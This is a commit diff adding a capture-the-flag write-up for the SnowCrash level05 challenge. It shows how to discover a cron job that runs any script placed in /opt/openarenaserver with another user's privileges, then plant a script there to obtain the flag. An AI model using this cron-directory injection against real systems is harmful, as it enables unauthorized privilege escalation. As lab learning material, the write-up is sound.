Update README.mdx

nuoxoxo · Nov 17, 2024 · 961eb0a · 961eb0a
1 parent dcd355a
commit 961eb0a
Showing 1 changed file with 61 additions and 1 deletion.
diff --git a/level05/README.mdx b/level05/README.mdx
@@ -1 +1,61 @@
-# 05 - Todo: `/var/mail` `cronjob`
+# 05
+
+First observation
+- an empty dir and nothing happens
+- a _hint_ says "mail" and "cronjob"
+
+Inspect `/var/mail`
+
+```b
+> crontab -l
+no crontab for level05
+
+> ls /var/mail
+level05
+
+> ls -l /var/mail/
+-rw-r--r--+ 1 root mail 58 Nov 17 20:25 level05
+^ ie. file
+
+> cat /var/mail/level05 
+*/2 * * * * su -c "sh /usr/sbin/openarenaserver" - flag05
+```
+
+👆 It is a cronjob
+- it runs every 2nd minute
+- it runs a script as flag05
+
+Inspect `/usr/sbin/openarenaserver`
+
+```b
+> ls -l /usr/sbin/openarenaserver
+-rwxr-x---+ 1 flag05 flag05 /usr/sbin/openarenaserver
+              ^^^^^^ ^^^^^^ resource excl. to user flag05
+
+> cat /usr/sbin/openarenaserver
+#!/bin/sh
+
+for i in /opt/openarenaserver/* ; do
+	(ulimit -t 5; bash -x "$i")
+	rm -f "$i"
+done
+```
+
+What this script does:
+- it runs each file of `/opt/openarenaserver/*` 
+- for each file, limit its exec runtime to 5 seconds
+- for each file, we print out what it is, if it is a _script_
+- rmv each file after use
+
+Exploit
+- put a script inside `/opt/openarenaserver/` 
+- use `tee` : _read stdin and write to stdout and files_
+- let it be run in 2min 
+
+```bash
+level05@SnowCrash:~$ echo '/bin/getflag > /tmp/temp' \
+> /opt/openarenaserver/solve.sh && \
+chmod +x /opt/openarenaserver/solve.sh
+
+# remember `/usr/sbin/openarenaserver` runs `bash -x "$i"` in a subshell
+```